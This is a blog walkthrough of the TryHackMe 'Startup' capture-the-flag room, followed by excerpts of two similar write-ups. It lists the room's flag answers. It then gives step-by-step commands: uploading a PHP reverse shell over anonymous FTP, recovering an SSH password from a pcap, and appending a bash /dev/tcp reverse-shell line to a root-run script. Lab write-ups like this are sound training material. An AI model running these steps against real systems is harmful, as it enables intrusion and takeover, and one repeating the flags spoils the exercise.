Startup - TryHackMe Problem Solving

Startup

Abuse traditional vulnerabilities via untraditional means.

🎂      🍔     🍕    🍗

 Task 1 Welcome to Spice Hut! 

We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!😐


Answer the questions below --------------------------------------------------------------

1. What is the secret spicy soup recipe? 💓

Answer: love

2.  What are the contents of user.txt? 

Answer: THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

3. What are the contents of root.txt?

Answer: THM{f963aaa6a430f210222158ae15c3d76d}

 

Task 2 Credits  

Spice Hut was very happy with your results and it is guaranteed they will spread word about your excellence with their partners. Astounding work!

Thank

Y😜u

 

 

Find my (tryhackme) official writeup 

here: https://www.youtube.com/watch?v=3qNxI1OggGc

I'd like to thank ku5e for being a good sensei and GeneralClaw, my grammar cop.

I'd like to thank my testers  Amit25095, BarZigmon and powershot.

Additionally, I'd love to thank TryHackMe not just for their platform, of which has changed my life, but for giving me this opportunity to give back to the community.

And of course, I'd like to thank you for playing. Hope to see you soon!

 

Answer the questions below ----------------------------------------------------

4. Congratulations!  

Answer: No anser needed


How are we going to solve this problem?

1. First of all, we will open "openvpn."

cmd: sudo openvpn "openvpn file.ovpn" 

2. After joining the room, we can deploy the machine.

3. We will do a scan with Nmap.

cmd: nmap -A -T4 IP address

get ftp name: anonymou

4. We will find directory with gobuster

cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

we are get "files" directory 

5. Go to browser and enter IP/files

cmd: ftp ip address

Name: anonymous

Password: anonymous

ftp> ls

ftp> get notice.txt

ftp> cd ftp

ftp> dir

6. Search Google for "php reverse shell," and on clicking the github link, open the php-reverse-shell.php file and download.

cmd: ifconfig

get your pc tur0: ip address 

7. php-reverse-shell.php file's IP address change with my pc IP address and set port number. (This php file location Downloads directory)

 ftp> lcd ~/Downloads

ftp> ls

ftp> dir

ftp> put php-reverse-shell.php

new1 cmd: nc -lvnp [port number] 

8. Check the IP/files/ftp link in your browser for php-reverse-shell.php upload confirmation and click on this file.

new1 cmd: pwd

new1 cmd: id

new1 cmd:  ls -la

new1 cmd: cat recipe.txt

get first ans: love

new1 cmd: cd home

new1 cmd: ls

new1 cmd: cd lennie

new1 cmd: cd ..

new1 cmd: ls

new1 cmd: cd incidents

new1 cmd: ls

suspicious.pcapng

new1 cmd: ls -la 

new1 cmd: python -m SimpleHTTPServer 

new2 cmd: wget http://IP:8000/suspicious.pcapng

new2 cmd: ls

new2 cmd: ettercap -T -r suspicious.pcapng

get TCP IP:Port Password: c4ntg3t3n0ughsp1c3

new3 cmd: ssh  lennie@IP

Input: yes

Input: TCP Password

new3 cmd: python -c 'import pty;pty.spawn("/bin/bash")'

new3 cmd: ls

[ user.txt  scripts ]

new3 cmd: cat user.txt

Get user.txt "text" 😍

new3 cmd: id

new3 cmd:  cd scripts/

new3 cmd: ls

[ planner.sh startup_list.txt ]

new3 cmd: cat planner.sh

new3 cmd: cat startup_list.txt

new3 cmd: cat /etc/print.sh

new4 cmd: ifconfig

9. we are install "Revers shell" add-ons on browser and set PC IP Address and port number.

new3 cmd: echo "bash -c 'exec bash -i &>dev/tcp/IP/Port <&1'">> /etc/print.sh

new3 cmd: cat /etc/print.sh

new4 cmd: nc -lvnp [port number]

new3 cmd: sudo -l

new4 cmd: ls

new4 cmd: cat root.txt

Get root text 😚😍

Comments

Post a Comment

Popular posts from this blog

Pickle Rick - TryHackMe Problem Solving

  Pickle Rick  A Rick and Morty CTF. Help turn Rick back into a human!   This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will  help Rick make his potion to transform himself back into a human from a pickle. Deploy the virtual machine on this task and explore the web application: MACHINE_IP  You can also access the web app using the following link:  https://LAB_WEB_URL.p.thmlabs.com  (this will update when the machine has fully started)   Answer the questions below   1. What is the first  ingredient Rick needs? Ans: mr. meeseek hair  2. Whats the second ingredient Rick needs? Ans: 1 jerry tear 3. Whats the final ingredient Rick needs? Ans: fleeb juice How to solve this problem? 1. First of all, we will open "openvpn." cmd: sudo openvpn "openvpn file.ovpn" 2. We will do a scan with Nmap. cmd: nmap IP address cmd: nikto -h http://ip | tee nikto.log 3. We will find php, sh, html,...
Read more

Tomghost - TryHackMe Problem Solving

Image
  tomghost Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.    Task 1 Flags 🐈 👽 👻 👿 💀 GHOST CAT   Are you able to complete the challenge? The machine may take up to 5 minutes to boot and configure.   Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark   Answer the questions below ------------------------------------------------------------------ 1. Compromise this machine and obtain user.txt Answer: THM{GhostCat_1s_so_cr4sy} 2. Escalate privileges and obtain root.txt Answer: THM{Z1P_1S_FAKE} How are we going to solve this problem? 1. First of all, we will open "openvpn." cmd: sudo openvpn "openvpn file.ovpn"  2. After joining the room, we can deploy the machine. 3. We will do a scan with Nmap. cmd: sudo  nmap -A -T4 IP Adderss 4. Go to your bro...
Read more